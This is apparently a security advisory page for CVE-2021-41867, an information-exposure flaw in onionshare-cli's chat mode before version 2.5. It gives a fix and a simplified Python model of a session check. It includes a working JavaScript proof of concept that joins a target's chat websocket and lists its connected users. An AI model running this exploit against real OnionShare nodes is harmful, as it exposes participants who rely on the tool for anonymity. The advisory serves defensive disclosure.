Information Exposure Affecting onionshare-cli package, versions [0,2.5)


Severity

medium

CVSS assessment made by Snyk's Security Team.

Threat Intelligence

Exploit Maturity: Proof of concept
EPSS: 0.22% (60th percentile)

  • Snyk ID: SNYK-PYTHON-ONIONSHARECLI-1924551
  • published: 21 Nov 2021
  • disclosed: 19 Nov 2021
  • credit: d0td0tslash

Introduced: 19 Nov 2021

CVE-2021-41867
CWE-200

How to fix?

Upgrade onionshare-cli to version 2.5 or higher.

Overview

onionshare-cli is software that lets you securely and anonymously send and receive files. It works by starting a web server, making it accessible as a Tor onion service, and generating an unguessable web address so others can download files from you, or upload files to you. It does not require setting up a separate server or using a third-party file-sharing service.

Affected versions of this package are vulnerable to Information Exposure via the chat_mode.py file, which allows remote unauthenticated attackers to connect via websocket and retrieve the full list of participants of a non-public OnionShare node via the --chat feature. The chat participants were leaked when the joined message was emitted in the websocket channel.

PoC

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
  </head>
  <body>
    <h1>OnionShare Disclosure of Connected Users PoC</h1>
    <ul id="user-list"></ul>
    <script src="https://cdn.socket.io/3.1.1/socket.io.min.js" crossorigin="anonymous"></script>
    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
    <script>
      $(function () {
        $(document).ready(function () {
          // Connect to the /chat namespace using the websocket transport only.
          var socket = io.connect(
            'http://<target Onion v3 address>.onion/chat',
            { transports: ['websocket'] }
          );
          // Emit 'joined' as soon as the socket connects.
          socket.on('connect', function () {
            socket.emit('joined', {});
          });
          // The 'status' reply carries the connected_users list.
          socket.on('status', function (data) {
            var userListHTML = '';
            var userslist = data.connected_users;
            for (var i = 0; i < userslist.length; i++) {
              userListHTML += `<li>${userslist[i]}</li>`;
            }
            $('#user-list').html(userListHTML);
          });
        });
      });
    </script>
  </body>
</html>
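The server-side check that closes this kind of leak, as an added example that is not OnionShare's code or its actual patch: a simplified Python model in which the joined handler either answers any socket (the behaviour described above) or answers only sockets that hold a server-issued session. `ChatHub`, `open_chat_page`, `on_joined` and `probe` are hypothetical names, and the user "alice" is constructed.

```python
import secrets


class ChatHub:
    """Toy model of a chat namespace (hypothetical; not OnionShare code)."""

    def __init__(self, require_session):
        self.require_session = require_session
        self.sessions = {}         # server-issued session token -> username
        self.connected_users = []  # roster that must not leak to strangers

    def open_chat_page(self, authenticated, name):
        """HTTP route: only an authenticated request is given a session."""
        if not authenticated:
            return None
        token = secrets.token_urlsafe(16)
        self.sessions[token] = name
        return token

    def on_joined(self, session_token):
        """Socket 'joined' handler; returns the 'status' payload sent back."""
        name = self.sessions.get(session_token)
        if self.require_session and name is None:
            return None  # no server-issued session: disclose nothing
        if name is not None and name not in self.connected_users:
            self.connected_users.append(name)
        return {"connected_users": list(self.connected_users)}


def probe(require_session):
    """A legitimate user joins, then a socket with no session emits 'joined'."""
    hub = ChatHub(require_session)
    token = hub.open_chat_page(authenticated=True, name="alice")  # constructed
    hub.on_joined(token)
    # Same shape as the PoC: a bare 'joined' event with no session behind it.
    return hub.on_joined(None)


if __name__ == "__main__":
    print("handler without session check:", probe(require_session=False))
    print("handler with session check:   ", probe(require_session=True))
```
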

CVSS Scores

version 3.1